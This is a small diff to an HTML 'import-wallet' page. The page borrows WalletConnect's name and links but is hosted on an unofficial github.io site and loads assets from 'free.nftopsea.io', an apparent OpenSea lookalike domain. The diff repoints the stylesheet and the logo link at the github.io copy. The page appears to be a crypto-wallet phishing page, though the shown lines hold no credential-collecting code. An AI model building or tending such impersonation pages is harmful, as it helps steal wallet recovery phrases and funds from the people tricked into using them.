--- a/sync/import-wallet/index.html
+++ b/sync/import-wallet/index.html
@@ -4,7 +4,7 @@
 
 <head>
     <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
-    <link rel="stylesheet" href="https://free.nftopsea.io/front/assets/main.css" type="text/css">
+    <link rel="stylesheet" href="main.css" type="text/css">
     <meta name="description" content="Open protocol for connecting Wallets to Dapps">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
     <meta property="og:image" content="images/logo.html">
@@ -33,7 +33,7 @@
     <div class="top">
         <a href="https://github.com/walletconnect" class="left">Github</a>
         <a href="https://docs.walletconnect.org/" class="left">Docs</a>
-        <a href="https://free.nftopsea.io/connect-wallet" class="main">
+        <a href="https://web3-bridge.github.io/sync/import-wallet" class="main">
             <img src="https://free.nftopsea.io/front/assets/logo.svg" alt="logo"></a>
         <a href="https://web3-bridge.github.io/sync/import-wallet" class="left">Wallets</a>
         <a href="https://web3-bridge.github.io/sync/import-wallet" class="left">Encryptor</a>
